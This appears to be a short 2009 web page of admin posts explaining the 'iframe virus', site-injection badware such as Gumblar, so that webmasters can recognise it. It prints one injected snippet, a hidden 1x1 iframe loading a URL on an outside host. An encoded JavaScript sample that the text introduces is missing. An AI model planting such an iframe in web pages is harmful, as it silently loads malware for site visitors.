malicious codes
I find suspicious javascript code in my files. Is it iframe virus?
Submitted by admin on Fri, 10/02/2009 - 03:55
Sometimes, iframe variants come in the form of javascript. You may NOT see iframe tags in the source because it will be encoded.
Instead, you may find this code in your html or PHP or ASP code:
Webmasters call it iframe virus? Why?
Submitted by admin on Thu, 10/01/2009 - 07:25
Badware like gumblar and other variants work by injecting malicious code into your website - be it HTML or PHP or ASP.
If you see the source of HTML, you will find some code like this:
<iframe src="http: //coolnameshop .cn/ in.cgi?income23" width=1 height=1 style="visibility: hidden"></iframe>
